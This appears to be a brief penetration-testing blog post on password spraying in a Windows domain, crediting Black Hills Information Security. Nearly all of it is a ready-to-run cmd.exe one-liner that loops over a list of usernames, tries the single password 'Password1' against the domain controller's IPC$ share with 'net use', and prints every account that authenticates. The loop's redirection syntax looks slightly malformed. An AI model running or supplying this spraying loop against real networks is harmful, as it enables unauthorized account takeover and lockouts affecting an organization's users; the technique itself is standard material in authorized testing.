Internal Infrastructure Pentest - Password Spraying With CMD
less than 1 minute read
- Password Spraying: It is a technique of trying one password across all the domain users.
- No tool needed. One can perform password spraing using cmd.exe
- net use %LOGONSERVER%\IPC$ /delete
- set PASSWORD=Password1
- FOR /F %n in (Documents\users.txt) DO @((net use %LOGONSERVER%\IPC$ /user:%USERDOMAIN%\%n %PASSWORD%
1>NUL 2>&1 && echo. && echo [*] %n:%PASSWORD% && net use /delete %LOGONSERVER%\IPC$ > NUL) || < set /p =.)
Thanks to : Black Hills Information Security (https://www.blackhillsinfosec.com/)